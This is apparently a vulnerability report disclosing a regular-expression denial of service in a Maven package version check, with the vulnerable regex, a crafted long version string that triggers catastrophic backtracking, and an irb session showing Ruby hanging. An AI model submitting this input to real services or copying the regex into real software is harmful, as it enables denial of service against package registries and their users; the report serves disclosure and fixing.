Skip to content

ReDoS in Maven package version

Summary

A recent MR has been merged and contains a regular expression (/\A(\.?[\w\+-]+\.?)+\z/) that puts ruby in an infinite loop.

Steps to reproduce

Submit a package name:

Use the following package name : aaaaaaaa.aaaaaaaaa+aa-111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111

which makes ruby to be stuck in a loop:

irb(main):018:0> maven_version_regex ||= /\A(\.?[\w\+-]+\.?)+\z/.freeze
irb(main):019:0> if "aaaaaaaa.aaaaaaaaa+aa-111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111111111111111111111!".match(maven_version_regex)
irb(main):020:1> puts 'ok'
irb(main):021:1> end
^CTraceback (most recent call last):
        6: from /Users/v/.rbenv/versions/2.6.5/bin/irb:23:in `<main>'
        5: from /Users/v/.rbenv/versions/2.6.5/bin/irb:23:in `load'
        4: from /Users/v/.rbenv/versions/2.6.5/lib/ruby/gems/2.6.0/gems/irb-1.0.0/exe/irb:11:in `<top (required)>'
        3: from (irb):19
        2: from (irb):19:in `match'
        1: from (irb):19:in `match'
IRB::Abort (abort then interrupt!)
Edited by David Fernandez